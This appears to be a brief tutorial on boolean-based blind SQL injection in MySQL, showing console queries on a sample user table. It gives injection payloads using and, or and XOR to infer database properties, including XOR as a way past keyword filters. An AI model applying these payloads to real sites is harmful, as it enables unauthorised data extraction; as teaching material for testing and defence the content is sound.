Boolean-based blind injection is used in the following situation: the page does not return the result of the query, but it reacts differently to the boolean inputs 0 and 1. That boolean-valued injection point can be used to inject a conditional expression, and the page's response then reveals whether the injected expression is true (the truth value of the injected expression directly determines whether the whole query returns a result).

1. Using and

  mysql> select * from user where id ='1' and 1=1;
  +----+----------+----------+
  | id | username | password |
  +----+----------+----------+
  | 1 | test | 123456 |
  +----+----------+----------+
  1 row in set (0.00 sec)
  mysql> select * from user where id ='1' and 1=2;
  Empty set (0.00 sec)

Replace the expression after and with the injected expression, for example:

  (select length(database()))>1

When the conditions on both sides are true, the page returns its normal result.

2. Using or

Same idea as with and; the only difference is logical OR instead of logical AND.

  mysql> select * from user where id = '1' or 1=2;
  +----+----------+----------+
  | id | username | password |
  +----+----------+----------+
  | 1 | test | 123456 |
  +----+----------+----------+
  1 row in set (0.00 sec)
  mysql> select * from user where id = '0' or 1=2;
  Empty set (0.00 sec)

3. Using ^

Sometimes keywords such as and and or are filtered; that is where ^ (XOR) comes in handy, and it is used very frequently.

  mysql> select * from user where id = 1 ^ 0;
  +----+----------+----------+
  | id | username | password |
  +----+----------+----------+
  | 1 | test | 123456 |
  +----+----------+----------+
  1 row in set (0.00 sec)
  mysql> select * from user where id = 1 ^ 1;
  Empty set (0.00 sec)

Practical application:

  mysql> select * from user where id = 1 ^ ((select length(database()))>19);
  +----+----------+----------+
  | id | username | password |
  +----+----------+----------+
  | 1 | test | 123456 |
  +----+----------+----------+
  1 row in set (0.00 sec)
  mysql> select * from user where id = 1 ^ ((select length(database()))>10);
  Empty set (0.00 sec)